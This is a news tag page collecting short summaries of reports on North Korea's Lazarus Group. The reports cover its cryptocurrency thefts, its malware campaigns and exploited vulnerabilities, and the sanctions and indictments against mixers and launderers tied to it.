All articles tagged with #lazarus group
Originally Published 3 months ago — by BBC
North Korean hackers have stolen over $2 billion in cryptocurrency this year, primarily targeting high-net-worth individuals, with the total regime-linked crypto theft surpassing $6 billion since 2017, funding North Korea's nuclear and missile programs, according to researchers.
Originally Published 1 year ago — by Bitcoinist
Reports suggest that North Korean hackers associated with the Lazarus Group exploited Ethereum through Tornado Cash and transferred 1 ETH to BlackRock, sparking speculation and raising concerns about potential illicit activities. Tornado Cash has faced increased scrutiny from US regulators, with the US Treasury Department targeting the software for its alleged role in facilitating cybercriminal activity. Despite the rebound in Ethereum's price, the motive behind the alleged transfer remains undisclosed, and BlackRock has not responded to the matter.
Originally Published 1 year ago — by The Hacker News
The Lazarus Group exploited a recently patched Windows Kernel flaw, CVE-2024-21338, as a zero-day to gain kernel-level access and disable security software on compromised hosts. This allowed them to run the FudModule rootkit, which can disable security solutions and manipulate Windows components. The attack showcases the group's technical sophistication and cross-platform focus, as they also target Apple macOS systems. This incident highlights the ongoing threat posed by the Lazarus Group as one of the most prolific and advanced persistent threat actors in the cybersecurity landscape.
Originally Published 2 years ago — by The Register
The Lazarus Group, a North Korean state-sponsored cyber unit, has been using malware strains written in DLang, a memory-safe programming language, in its recent attacks. Cisco Talos discovered at least three DLang-based malware strains used in attacks on organizations in various industries. The attacks, part of "Operation Blacksmith," targeted organizations with n-day vulnerabilities, including the log4j vulnerability. The malware strains, including NineRAT, BottomLoader, and DLRAT, exhibited similar tactics and techniques. DLang is an uncommon choice for writing malware, but there has been an increasing trend among cybercriminals to use newer memory-safe languages like Rust and DLang.
Originally Published 2 years ago — by The Hacker News
The Lazarus Group, a North Korea-linked threat actor, has launched a global campaign exploiting security flaws in Log4j to deploy previously undocumented remote access trojans (RATs) on compromised hosts. The campaign, known as Operation Blacksmith, involves the use of DLang-based malware families, including a RAT called NineRAT that utilizes Telegram for command-and-control. The Lazarus Group's tactics overlap with the sub-group Andariel, which is responsible for initial access and espionage activities. The attacks target various sectors, including manufacturing, agriculture, and physical security. The group takes advantage of the widespread use of vulnerable versions of Log4j and employs multiple tools for persistent access.
Originally Published 2 years ago — by Treasury
The U.S. Department of the Treasury's Office of Foreign Assets Control (OFAC) has sanctioned Sinbad.io, a virtual currency mixer used by the Lazarus Group, a state-sponsored cyber hacking group from North Korea, to launder stolen virtual currency. Sinbad has processed millions of dollars' worth of virtual currency from Lazarus Group heists and is also used for illicit activities such as sanctions evasion, drug trafficking, and the purchase of child sexual abuse materials. This designation builds on previous actions taken by OFAC to expose elements of the virtual currency ecosystem used by malicious cyber actors.
Originally Published 2 years ago — by The Hacker News
North Korean hackers associated with the Lazarus Group are combining different elements of their macOS malware campaigns, using RustBucket droppers to deliver the KANDYKORN malware. Cybersecurity firm SentinelOne has linked a third macOS-specific malware called ObjCShellz to the RustBucket campaign. The Lazarus Group is utilizing a backdoored version of a PDF reader app, SwiftLoader, to distribute KANDYKORN, demonstrating the evolving and collaborative nature of North Korean cyber threats. This tactic makes it challenging for defenders to track and attribute malicious activities. Additionally, a subgroup within Lazarus, Andariel, has been implicated in cyber attacks exploiting a security flaw in Apache ActiveMQ.
Originally Published 2 years ago — by Department of Justice
The founders of Tornado Cash, a cryptocurrency mixer, have been charged with conspiracy to commit money laundering, conspiracy to commit sanctions violations, and conspiracy to operate an unlicensed money transmitting business. Roman Storm has been arrested in Washington state, while Roman Semenov remains at large. The indictment alleges that Tornado Cash facilitated over $1 billion in money laundering transactions and laundered hundreds of millions of dollars for the sanctioned North Korean cybercrime organization, Lazarus Group. The founders knowingly operated the service, despite being aware of its use by hackers and fraudsters to conceal the proceeds of their crimes.
Originally Published 2 years ago — by CoinDesk
The FBI has issued a warning that North Korean hackers, specifically the Lazarus Group and APT38, may attempt to sell stolen bitcoin worth over $40 million. These hacker groups were responsible for various cryptocurrency hacks earlier this year, including the theft of $60 million from Alphapo and $100 million from Atomic Wallet. The FBI has identified six wallets containing a total of 1,580 bitcoin connected to these groups and advises cryptocurrency companies to avoid interacting with them. The agency vows to continue combating North Korea's illicit activities, including cybercrime and virtual currency theft.
Originally Published 2 years ago — by Fox Business
A North Korean banker has been indicted and two cryptocurrency traders have been sanctioned for their alleged involvement in a money laundering scheme to generate revenue for North Korea's regime. The scheme involved laundering stolen cryptocurrency for the North Korea-based Lazarus Group, evading sanctions put in place by the US Treasury Department to stop the country's ballistic missile programs. North Korea has generated revenue through cryptocurrency thefts and other schemes since at least 2017, stealing an estimated $1.7 billion worth of cryptocurrency last year alone.